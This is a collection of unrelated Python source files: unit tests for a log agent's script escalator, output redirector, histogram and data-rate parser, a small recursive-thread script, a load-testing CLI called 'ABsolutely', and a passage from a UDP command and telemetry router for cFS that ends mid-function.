super(TestScriptEscalator, self).tearDown()
if "__main__" in sys.modules:
del sys.modules["__main__"]
def test_is_user_change_required(self):
(test_instance, controller) = self.create_instance("czerwin", "fileA", "steve")
self.assertTrue(test_instance.is_user_change_required())
(test_instance, controller) = self.create_instance(
"czerwin", "fileA", "czerwin"
)
self.assertFalse(test_instance.is_user_change_required())
def test_change_user_and_rerun_script(self):
# NOTE: __main__.__file__ might not be set when running tests under pytests or nosetests
mock_main = mock.Mock()
mock_main.__file__ = "/tmp/file.py"
sys.modules["__main__"] = mock_main
(test_instance, controller) = self.create_instance("czerwin", "fileA", "steve")
self.assertEquals(test_instance.change_user_and_rerun_script("random"), 0)
self.assertEquals(controller.call_count, 1)
self.assertEquals(controller.last_call["user"], "steve")
self.assertEqual(controller.last_call["script_file"], "/tmp/file.py")
def create_instance(self, current_user, config_file, config_owner):
controller = TestScriptEscalator.ControllerMock(
current_user, config_file, config_owner
)
# noinspection PyTypeChecker
return ScriptEscalator(controller, config_file, os.getcwd()), controller
class ControllerMock(object):
def __init__(self, running_user, expected_config_file, config_owner):
self.__running_user = running_user
self.__expected_config_file = expected_config_file
self.__config_owner = config_owner
self.last_call = None
self.call_count = 0
def get_current_user(self):
return self.__running_user
def get_file_owner(self, config_file_path):
assert self.__expected_config_file == config_file_path
if self.__expected_config_file == config_file_path:
return self.__config_owner
else:
return None
def run_as_user(self, user, script_file_path, script_binary, script_args):
self.call_count += 1
self.last_call = {
"user": user,
"script_file": script_file_path,
"script_binary": script_binary,
"script_args": script_args,
}
return 0
class TestRedirectorServer(ScalyrTestCase):
"""Tests the RedirectorServer code using fakes for stdout, stderr and the channel.
"""
def setUp(self):
super(TestRedirectorServer, self).setUp()
# Allows us to watch what bytes are being sent to the client.
self._channel = FakeServerChannel()
# Allows us to write bytes to stdout, stderr without them going to the terminal.
self._sys = FakeSys()
self._server = RedirectorServer(self._channel, sys_impl=self._sys)
def test_sending_str(self):
self._server.start()
# Verify that the server told the channel to accept the next client connection.
self.assertEquals(self._channel.accept_count, 1)
# Simulate writing to stdout.
self._sys.stdout.write("Testing")
# Make sure we wrote a message to the channel
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, "Testing")
def test_sending_unicode(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stdout.write("caf\xe9")
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, "caf\xe9")
def test_sending_to_stderr(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stderr.write("Testing again")
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 1)
self.assertEquals(content, "Testing again")
def test_connection_failure(self):
# Set the channel to simulate a connection timeout.
self._channel.timeout_connection = True
caught_it = False
try:
# Make sure that we get an exception.
self._server.start()
except RedirectorError:
caught_it = True
self.assertTrue(caught_it)
def _parse_sent_bytes(self, content):
"""Parses the stream id and the actual content from the encoded content string sent by the server.
@param content: The string sent by the server.
@type content: six.binary_type
@return: A tuple of the stream_id and the actual content encoded in the sent string.
@rtype: (int,six.text_type)
"""
prefix_code = content[0:4]
# 2->TODO struct.pack|unpack in python < 2.7.7 does not allow unicode format string.
code = compat.struct_unpack_unicode("i", prefix_code)[0]
stream_id = code % 2
num_bytes = code >> 1
self.assertEquals(len(content), num_bytes + 4)
decoded_str = content[4:].decode("utf-8")
return stream_id, decoded_str
class TestRedirectorClient(ScalyrTestCase):
"""Test the RedirectorClient by faking out the client channel and also the clock.
"""
def setUp(self):
super(TestRedirectorClient, self).setUp()
self._fake_sys = FakeSys()
# Since the client is an actual other thread that blocks waiting for input from the server, we have to
# simulate the time using a fake clock. That will allow us to wait up the client thread from time to time.
self._fake_clock = scalyr_util.FakeClock()
# The fake channel allows us to insert bytes being sent by the server.
self._client_channel = FakeClientChannel(self._fake_clock)
self._client = RedirectorClient(
self._client_channel, sys_impl=self._fake_sys, fake_clock=self._fake_clock
)
self._client.start()
# Wait until the client thread begins to block for the initial accept from the server.
self._fake_clock.block_until_n_waiting_threads(1)
def tearDown(self):
if self._client is not None:
self._client.stop(wait_on_join=False)
self._fake_clock.advance_time(set_to=59.0)
self._client.join()
def test_receiving_bytes(self):
# Simulate accepting the connection.
self._accept_client_connection()
self._send_to_client(0, "Testing")
# Wait until have bytes written to stdout by the client thread.
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, "Testing")
def test_receiving_unicode(self):
self._accept_client_connection()
self._send_to_client(0, "caf\xe9")
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, "caf\xe9")
def test_connection_timeout(self):
# We advance the time past 60 seconds which is the connection time out.
self._fake_clock.advance_time(set_to=61.0)
got_it = False
try:
# Even though we have not called stop on the thread or the server hasn't closed the connection,
# we should still see the client thread terminate because of the exception it raises.
self._client.join()
except RedirectorError:
got_it = True
self._client = None
self.assertTrue(got_it)
def test_close_from_server(self):
self._accept_client_connection()
self._send_to_client(-1, "")
# Even though we haven't called stop on the client thread, it should still end because the server sent
# the signal to stop/close.
self._client.join()
self._client = None
def test_stopped_during_connection(self):
self._client.stop(wait_on_join=False)
# We have wake all threads so the client thread will notice its thread has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def test_stopped_during_reading(self):
self._accept_client_connection()
self._client.stop(wait_on_join=False)
# We have wake all threads so the client thread will notice its thread has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def _accept_client_connection(self):
self._client_channel.simulate_server_connect()
def _send_to_client(self, stream_id, content):
if type(content) is six.text_type:
encoded_content = six.text_type(content).encode("utf-8")
else:
encoded_content = content
code = len(encoded_content) * 2 + stream_id
# 2->TODO struct.pack|unpack in python < 2.7.7 does not allow unicode format string.
self._client_channel.simulate_server_write(
compat.struct_pack_unicode("i", code) + encoded_content
)
class TestRedirectionService(ScalyrTestCase):
"""Tests both the RedirectorServer and the RedirectorClient communicating together.
"""
def setUp(self):
super(TestRedirectionService, self).setUp()
self._client_sys = FakeSys()
self._server_sys = FakeSys()
self._fake_clock = scalyr_util.FakeClock()
self._client_channel = FakeClientChannel(self._fake_clock)
self._server_channel = FakeServerChannel(self._client_channel)
self._client = RedirectorClient(
self._client_channel, sys_impl=self._client_sys, fake_clock=self._fake_clock
)
self._server = RedirectorServer(self._server_channel, sys_impl=self._server_sys)
self._client.start()
self._server.start()
def test_end_to_end(self):
self._server_sys.stdout.write("Test full")
self._server.stop()
self._client.stop()
class FakeServerChannel(RedirectorServer.ServerChannel):
"""A mock-like object for the ServerChannel that allows us to see if certain methods were invoked and with
what arguments.
"""
def __init__(self, client_channel=None):
# Gives the counts of the various methods.
self.close_count = 0
self.accept_count = 0
self.write_count = 0
# The last string that was used when invoking `write`.
self.last_write = None
# If set to True, when the server invokes `accept_client`, it will simulate a connection timeout.
self.timeout_connection = False
# If not None, the fake client channel to send the bytes from `write`.
self._client_channel = client_channel
def accept_client(self, timeout=None):
self.accept_count += 1
if not self.timeout_connection and self._client_channel is not None:
self._client_channel.simulate_server_connect()
return not self.timeout_connection
def write(self, content):
self.write_count += 1
self.last_write = content
if self._client_channel is not None:
self._client_channel.simulate_server_write(content)
def close(self):
self.close_count += 1
class FakeClientChannel(object):
"""Fakes out the RedirectorClient.ClientChannel interface.
This allows us to simulate the connection being accepted by the server and bytes being sent by the server.
"""
def __init__(self, fake_clock):
self._lock = threading.Lock()
self._allow_connection = False
self._pending_content = b""
self._fake_clock = fake_clock
def connect(self):
self._lock.acquire()
result = self._allow_connection
self._lock.release()
return result
def peek(self):
self._lock.acquire()
if self._pending_content is not None:
bytes_to_read = len(self._pending_content)
else:
bytes_to_read = 0
self._lock.release()
return bytes_to_read, 0
def read(self, num_bytes_to_read):
self._lock.acquire()
assert num_bytes_to_read <= len(self._pending_content)
result = self._pending_content[0:num_bytes_to_read]
self._pending_content = self._pending_content[num_bytes_to_read:]
self._lock.release()
return result
def close(self):
pass
def simulate_server_connect(self):
self._lock.acquire()
self._allow_connection = True
self._lock.release()
self._simulate_busy_loop_advance()
def simulate_server_write(self, content):
self._lock.acquire()
self._pending_content = b"%s%s" % (self._pending_content, content)
self._lock.release()
self._simulate_busy_loop_advance()
def _simulate_busy_loop_advance(self):
self._fake_clock.advance_time(increment_by=0.4)
class FakeSys(object):
def __init__(self):
self.stdout = FakeSys.FakeFile()
self.stderr = FakeSys.FakeFile()
class FakeFile(object):
def __init__(self):
self._condition = threading.Condition()
self._last_write = None
def write(self, content):
self._condition.acquire()
self._last_write = content
self._condition.notifyAll()
self._condition.release()
@property
def last_write(self):
self._condition.acquire()
result = self._last_write
self._condition.release()
return result
def wait_for_bytes(self, timeout):
self._condition.acquire()
try:
if self._last_write is not None:
return
self._condition.wait(timeout)
finally:
self._condition.release()
class TestHistogramTracker(ScalyrTestCase):
"""Tests the HistogramTracker abstraction.
"""
def setUp(self):
super(TestHistogramTracker, self).setUp()
self._testing = HistogramTracker([10, 25, 50, 100])
def test_count(self):
self.assertEqual(self._testing.count(), 0)
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertEqual(self._testing.count(), 2)
self._testing.reset()
self.assertEqual(self._testing.count(), 0)
def test_average(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.average(), 6.0)
self._testing.reset()
self.assertIsNone(self._testing.average())
self._testing.add_sample(6)
self.assertAlmostEqual(self._testing.average(), 6.0)
def test_min(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.min(), 0.5)
self._testing.reset()
self.assertIsNone(self._testing.min())
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 15.0)
def test_max(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.max(), 11.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.reset()
self.assertIsNone(self._testing.max())
self._testing.add_sample(0)
self.assertAlmostEqual(self._testing.max(), 0)
def test_buckets(self):
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 0)
self._testing.add_sample(2)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 1)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self._testing.add_sample(50)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(5)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(200)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 3)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self.assertBucketEquals(buckets[2], (1, 100, 200.01))
def test_estimate_percentile(self):
self.assertIsNone(self._testing.estimate_median())
self._testing.add_sample(0)
self._testing.add_sample(3)
self._testing.add_sample(4)
# Since all of the values fall into the first bucket, the estimate of the percentile will be the same for all
# percentiles.
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 5.0)
self._testing.add_sample(11)
self._testing.add_sample(12)
self._testing.add_sample(13)
self._testing.add_sample(55)
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 17.5)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 75.0)
def test_summarize(self):
self.assertEqual(self._testing.summarize(), "(count=0)")
self._testing.add_sample(2)
self._testing.add_sample(4)
self._testing.add_sample(45)
self._testing.add_sample(200)
self.assertEqual(
self._testing.summarize(),
"(count=4,avg=62.75,min=2.00,max=200.00,median=6.00)",
)
def assertBucketEquals(self, first, second):
self.assertEquals(first[0], second[0], msg="The counts do not equal")
self.assertAlmostEquals(
first[1], second[1], msg="The lower bounds do not equal"
)
self.assertAlmostEquals(
first[2], second[2], msg="The upper bounds do not equal"
)
def _buckets_to_list(self):
result = []
for count, lower, upper in self._testing.buckets():
result.append((count, lower, upper))
return result
class TestParseValueWithRate(ScalyrTestCase):
def test_numerators(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertEqual(100 * 1000, scalyr_util.parse_data_rate_string("100 kB/s"))
self.assertEqual(
100 * 1000 * 1000, scalyr_util.parse_data_rate_string("100 mB/s")
)
self.assertEqual(
100 * 1000 * 1000 * 1000, scalyr_util.parse_data_rate_string("100 gB/s")
)
self.assertEqual(
100 * 1000 * 1000 * 1000 * 1000,
scalyr_util.parse_data_rate_string("100 tB/s"),
)
self.assertEqual(100 * 1024, scalyr_util.parse_data_rate_string("100 kiB/s"))
self.assertEqual(
100 * 1024 * 1024, scalyr_util.parse_data_rate_string("100 miB/s")
)
self.assertEqual(
100 * 1024 * 1024 * 1024, scalyr_util.parse_data_rate_string("100 giB/s")
)
self.assertEqual(
100 * 1024 * 1024 * 1024 * 1024,
scalyr_util.parse_data_rate_string("100 tiB/s"),
)
def test_denominators(self):
self.assertEqual(100000, scalyr_util.parse_data_rate_string("100000 B/s"))
self.assertEqual(
100000 / 60.0, scalyr_util.parse_data_rate_string("100000 B/m")
)
self.assertEqual(
100000 / 60.0 / 60.0, scalyr_util.parse_data_rate_string("100000 B/h")
)
self.assertEqual(
100000 / 60.0 / 60.0 / 24.0,
scalyr_util.parse_data_rate_string("100000 B/d"),
)
self.assertEqual(
100000 / 60.0 / 60.0 / 24.0 / 7.0,
scalyr_util.parse_data_rate_string("100000 B/w"),
)
def test_spacing(self):
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1 kiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1\tkiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1 \t \t kiB/s"))
def test_capitalization(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/S"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 b/S")
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 b/s")
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1KiB/S"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kIB/S"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1KB/S"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1kB/S"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1Kb/S")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1kib/S")
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1KiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kIB/s"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1KB/s"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1kB/s"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1Kb/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1kb/s")
def test_values(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertEqual(-100, scalyr_util.parse_data_rate_string("-100 B/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("0 B/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("0 gB/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("-0 gB/s"))
self.assertEqual(-100.2456, scalyr_util.parse_data_rate_string("-100.2456 B/s"))
self.assertEqual(
199.000001, scalyr_util.parse_data_rate_string("199.000001 B/s")
)
self.assertEqual(
1024 * 1024 * 1024 * 1024 / 60.0 / 60.0 / 24.0 / 7.0,
scalyr_util.parse_data_rate_string("1 tiB/w"),
)
def test_invalid_inputs(self):
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "B/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 /")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "- B/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 YB/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 B/C")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 D/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 g1/s")
|
container.py
|
import threading
import sys
def fun(i):
try:
fun(i+1)
except:
sys.exit(0)
t = threading.Thread(target=fun, args=[1])
t.start()
|
absolutely.py
|
#!/usr/bin/env python
"""
`votakvot-ABsolutely` is a script you can use to quickly smoke-test your application.
It run user-provided python function from many greenlets and collect time statistics.
ABsolutely was inspired by https://github.com/tarekziade/boom
It behaves similar to Apache Bench, but call python callback instead of making HTTP calls.
"""
from __future__ import annotations
import contextlib
import collections
import datetime
import argparse
import importlib
import threading
import time
import math
import collections
import functools
import logging
import sys
import os
import queue
import traceback
import votakvot
import votakvot.core
import votakvot.meta
from votakvot.data import FancyDict
logger = logging.getLogger(__file__)
def _resolve_obj_rec(name: str):
try:
return importlib.import_module(name)
except ImportError:
if "." not in name: # no chance
raise
ns_name, obj_name = name.rsplit(".", 1)
mod = _resolve_obj_rec(ns_name)
return getattr(mod, obj_name)
def resolve_obj(name: str):
orig_sys_path = list(sys.path)
try:
sys.path.append(os.getcwd())
return _resolve_obj_rec(name)
finally:
sys.path.clear()
sys.path.extend(orig_sys_path)
def _calc_percentiles(data, pcts):
data = sorted(data)
size = len(data)
return {
pct: data[int(math.ceil((size * pct) / 100)) - 1]
for pct in pcts
if len(data) > 500 / min(pct, 100 - pct)
}
class StatsCollector:
_percentiles = [5, 10, 25, 50, 75, 90, 95, 97, 98, 99, 99.5, 99.9]
def __init__(
self,
tracker: votakvot.core.Tracker,
warmup: int = 0,
max_errors: int = 0,
lock = None,
):
self._lock = lock or contextlib.nullcontext()
self._warmup = warmup
self._started = time.time()
self._finished = None
self.tracker = tracker
self.results = collections.Counter()
self.errors = collections.Counter()
self.errors_all = collections.deque(maxlen=max_errors)
self.total_count = 0
self.total_time = 0
self.errors_count = 0
self.times_all = []
def add_result(self, result, duration, error=None):
with self._lock:
self._add_result0(result, duration, error)
def _add_result0(self, result, duration, error):
if self._warmup > 0:
self._warmup -= 1
return
elif self._warmup == 0:
self._started = time.time()
self._warmup = -1
error_repr = repr(error) if error else None
self.total_count += 1
self.results[result] += 1
self.tracker.meter({
'duration': duration,
'result': result,
'error': repr(error) if error else None,
})
if duration is not None:
self.times_all.append(duration)
self.total_time += duration
if error is not None:
self.errors[error_repr] += 1
self.errors_count += 1
self.errors_all.append(error)
def calc_stats(self):
self._finished = self._finished or time.time()
average = sum(self.times_all) / len(self.times_all) if self.times_all else None
return FancyDict(
total_count=self.total_count,
total_time=self.total_time,
real_rps=self.total_count / (self._finished - self._started),
duration=FancyDict(
average=average,
maximum=max(self.times_all),
minimum=min(self.times_all),
std_dev=math.sqrt(sum((x - average) ** 2 for x in self.times_all) / len(self.times_all)),
percentiles=_calc_percentiles(self.times_all, self._percentiles),
) if self.times_all else None,
results=[
{"result": k, "count": v}
for k, v in self.results.most_common()
],
errors_count=self.errors_count,
errors=[
{"error": k, "count": v}
for k, v in self.errors.most_common()
],
)
def _do_onecall(collector: StatsCollector, callback):
duration = None
error = None
result = None
start = time.time()
try:
result = callback()
except Exception as e:
error = e
else:
duration = time.time() - start
finally:
collector.add_result(result, duration, error)
class ConcurrencyEnv:
def __init__(self, concurrency):
self.global_lock = threading.RLock()
self.concurrency = concurrency
self.queue = queue.Queue(maxsize=concurrency * 4)
self.done = False
def start(self):
for i in range(self.concurrency):
self.start_worker()
def worker_run(self):
while True:
f = self.queue.get()
try:
f()
except Exception:
traceback.print_exc()
finally:
self.queue.task_done()
def shutdown(self, wait):
self.done = True
if wait:
self.queue.join()
def spawn(self, function):
if not self.done:
self.queue.put(function)
class GeventConcurrencyEnv(ConcurrencyEnv):
@staticmethod
def gevent_install():
import gevent.monkey
gevent.monkey.patch_all()
def start_worker(self):
import gevent
g = gevent.Greenlet(run=self.worker_run)
g.start()
class ThreadConcurrencyEnv(ConcurrencyEnv):
def start_worker(self):
t = threading.Thread(target=self.worker_run, daemon=True)
t.start()
def run(
path,
callback,
params=None,
tid=None,
number=1,
warmup=0,
duration=None,
meta_providers=None,
show_progress=False,
strict=False,
max_errors=None,
concurrency_env=None,
):
assert number is None or duration is None
concurrency_env = concurrency_env or ThreadConcurrencyEnv(1)
concurrency_env.start()
meta = votakvot.meta.capture_meta(meta_providers)
tracker = votakvot.core.Tracker(path=f"{path}/{tid}", meta=meta, tid=tid)
if show_progress:
import tqdm
if duration is None:
progressbar = tqdm.tqdm(total=number, leave=False)
else:
progressbar = tqdm.tqdm(total=None)
else:
progressbar = None
def dorun(**params):
if isinstance(callback, type):
real_callback = callback(**params)
else:
real_callback = functools.partial(callback, **params)
collector = StatsCollector(
tracker,
warmup=warmup,
max_errors=max_errors,
lock=concurrency_env.global_lock,
)
def call():
_do_onecall(collector, real_callback)
if show_progress:
progressbar.update()
def spawn():
concurrency_env.spawn(call)
def checkerr():
if strict and collector.errors_all:
raise collector.errors_all[-1]
with progressbar if progressbar is not None else contextlib.nullcontext():
if number is None:
until = time.time() + duration
while time.time() < until:
spawn()
checkerr()
concurrency_env.shutdown(False)
else:
for _ in range(number + warmup):
spawn()
checkerr()
concurrency_env.shutdown(True)
checkerr()
stats = collector.calc_stats()
if isinstance(callback, type):
if hasattr(real_callback, '__close__'):
real_callback.__close__()
return stats
with votakvot.using_tracker(tracker, globally=True):
tracker.run(dorun, **(params or {}))
return votakvot.core.Trial(tracker.path)
def main(args=None):
parser = argparse.ArgumentParser(description="votakvot cli runner")
parser.add_argument("-c", "--concurrency", help="Concurrency", type=int, default=1)
parser.add_argument("-q", "--quiet", help="Don't display progress bar", action="store_true")
parser.add_argument("-w", "--warmup", help="Number of skipped requests", default=0, type=int)
parser.add_argument("-p", "--path", help="Path to results storage", type=str, default=".")
parser.add_argument("-t", "--tid", help="Tid identifier", default=None)
parser.add_argument("-g", "--gevent", help="Patch sockets with Gevent", action='store_true', default=False)
parser.add_argument("-s", "--strict", help="Fail on a first error", action='store_true')
parser.add_argument("--max-errors", help="Max number of captured errors", type=int, default=100)
group = parser.add_mutually_exclusive_group()
group.add_argument("-n", "--number", help="Number of requests", type=int)
group.add_argument("-d", "--duration", help="Duration in seconds", type=int)
parser.add_argument("callback", type=str, help="Python callable name")
parser.add_argument("param", metavar="KEY=VALUE", nargs="*", help="Function named argument")
opts = parser.parse_args(args)
if opts.gevent:
GeventConcurrencyEnv.gevent_install()
concurrency_env = GeventConcurrencyEnv(opts.concurrency)
else:
concurrency_env = ThreadConcurrencyEnv(opts.concurrency)
if opts.number is None and opts.duration is None:
opts.number = 1
if opts.concurrency > 100:
print("warning: too big `concurrency`, consider enabling Gevent with `--gevent`")
callback_name = opts.callback
callback = resolve_obj(opts.callback)
if opts.tid is None:
dt_suffix = datetime.datetime.now().strftime("%y-%m-%d/%H:%M:%S")
opts.tid = f"{callback_name}/{dt_suffix}"
params = {}
for p in opts.param:
k, v = p.split("=", 1)
if k in params:
raise ValueError("Duplicated parameter", k)
try:
v = eval(v, {}, {})
except Exception:
pass
params[k] = v
print("votakvot")
print(f"run '{callback_name}(" + ", ".join(f"{k}={v!r}" for k, v in params.items()) + ")'")
print(f"use {opts.concurrency} parallel workers")
if opts.number:
print(f"make {opts.number} runs")
else:
print(f"keep running for {round(opts.duration)} seconds")
if opts.warmup:
print(f"skip {opts.warmup} first runs")
print("running...")
trial = run(
callback=callback,
params=params,
path=opts.path,
tid=opts.tid,
number=opts.number,
duration=opts.duration,
warmup=opts.warmup,
show_progress=not opts.quiet,
strict=opts.strict,
max_errors=opts.max_errors,
concurrency_env=concurrency_env,
)
try:
collector = trial.result
except votakvot.core.TrialFailedException as e:
print("absolutely fail!")
print(e.traceback_txt.strip())
exit(2)
print("done")
print("")
if collector.real_rps > 1000:
print(f"warning: too high rps\nresults might be very unaccurate")
print()
def ms(t):
return "{:.2f} ms".format(1000 * t)
print(f"was made \t {collector.total_count} runs")
if collector.duration:
print(f"average \t {ms(collector.duration.average)}")
print(f"std_dev \t {ms(collector.duration.std_dev)}")
print(f"minimum \t {ms(collector.duration.minimum)}")
print(f"maximum \t {ms(collector.duration.maximum)}")
print(f"percentiles:")
for pn, pv in collector.duration.percentiles.items():
print(f" pct {pn:02} \t {ms(pv)}")
if collector.results:
print(f"results:")
for d in collector.results:
print(f" {d.count} times \t {d.result!r}")
else:
print(f"no results")
if collector.errors:
print(f"errors:")
for e in collector.errors:
print(f" {e.count} times \t {e.error}")
else:
print(f"no errors")
print(f"more info at\n {trial.path}")
print("absolutely!")
if __name__ == "__main__":
main()
|
cmdtlmrouter.py
|
"""
Copyright 2022 Open STEMware Foundation
All Rights Reserved.
This program is free software; you can modify and/or redistribute it under
the terms of the GNU Affero General Public License as published by the Free
Software Foundation; version 3 with attribution addendums as found in the
LICENSE.txt
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
details.
This program may also be used under the terms of a commercial or enterprise
edition license of cFSAT if purchased from the copyright holder.
Purpose:
Manage UDP connections to the cFS
Notes:
1. This design supports a singe router connected to a single cFS
instance running UDP versions of the command ingest and telemetru
output aps.
2. The app that creates the router communicates via queues to the router.
The router supports additional command and telemetry UDP telemetry.
Commands from mutliple UDP command sockets are not sent to the cFS and
are placed in a queue that can be read by the parent app. This allows
the app to serve as a single point for managing flight commands.
Telemetry is routed from the cFS sokect to multiple telemetry
monitors.
3.
"""
import socket
import logging
from queue import Queue
from threading import Thread, Lock
logger = logging.getLogger("router")
###############################################################################
class CfsCmdSource():
"""
Provide a socket to receive cFS commands from a cFSAT CmdTlmProcess
object.
"""
def __init__(self, ip_addr, port, timeout):
self.enabled = True
self.socket = None
self.ip_addr = ip_addr
self.port = port
self.socket_addr = (self.ip_addr, self.port)
self.timeout = timeout
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.socket_addr)
self.socket.setblocking(False)
self.socket.settimeout(self.timeout)
def read_cmd_port(self, queue):
try:
while True:
datagram, host = self.socket.recvfrom(1024)
queue.put((datagram, host))
logger.info(f"Received cmd source datagram: size={len(datagram)} {host}")
print(f"Received cmd source datagram: size={len(datagram)} {host}")
except socket.timeout:
pass
###############################################################################
class CmdTlmRouter(Thread):
def __init__(self, cfs_ip_addr, cfs_cmd_port, gnd_ip_addr, gnd_tlm_port, gnd_tlm_timeout):
super().__init__()
self.enabled = True
# COMMANDS
self.cfs_cmd_socket = None
self.cfs_ip_addr = cfs_ip_addr
self.cfs_cmd_port = cfs_cmd_port
self.cfs_cmd_queue = Queue()
self.cfs_cmd_socket_addr = (self.cfs_ip_addr, self.cfs_cmd_port)
self.cfs_cmd_source = {}
self.cfs_cmd_source_queue = Queue()
# TELEMETRY
self.gnd_tlm_socket = None
self.gnd_ip_addr = gnd_ip_addr
self.gnd_tlm_port = gnd_tlm_port
self.gnd_tlm_queue = Queue()
self.gnd_tlm_socket_addr = (self.gnd_ip_addr, self.gnd_tlm_port)
self.gnd_tlm_timeout = gnd_tlm_timeout
self.tlm_dest_mutex = Lock()
self.tlm_dest_addr = {}
self.tlm_dest_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.tlm_dest_connect_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.tlm_dest_connect_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.tlm_dest_connect_socket.bind((self.gnd_ip_addr, 7777))
self.tlm_dest_connect_socket.setblocking(True)
self.tlm_dest_connect = Thread(target=self.tlm_dest_connect_thread)
self.tlm_dest_connect.kill = False
logger.info(f"CmdTlmRouter Init: cfs_cmd_socket{self.cfs_cmd_socket_addr}, gnd_tlm_socket{self.gnd_tlm_socket_addr}")
def get_cfs_cmd_source_queue(self):
return self.cfs_cmd_source_queue
def get_cfs_cmd_queue(self):
return self.cfs_cmd_queue
def get_gnd_tlm_queue(self):
return self.gnd_tlm_queue
def add_cmd_source(self, cmd_port):
self.cfs_cmd_source[cmd_port] = CfsCmdSource(self.gnd_ip_addr, cmd_port, 0.1) #todo - Decide on timeout management
def remove_cmd_source(self, cmd_port):
try:
del self.cfs_cmd_source[cmd_port]
except KeyError:
logger.error("Error removing nonexitent command source %d from cfs_cmd_source dictionary" % cmd_port)
def add_tlm_dest(self, tlm_port):
self.tlm_dest_mutex.acquire()
self.tlm_dest_addr[tlm_port] = (self.gnd_ip_addr, tlm_port)
self.tlm_dest_mutex.release()
def remove_tlm_dest(self, tlm_port):
self.tlm_dest_mutex.acquire()
try:
del self.tlm_dest_addr[tlm_port]
except KeyError:
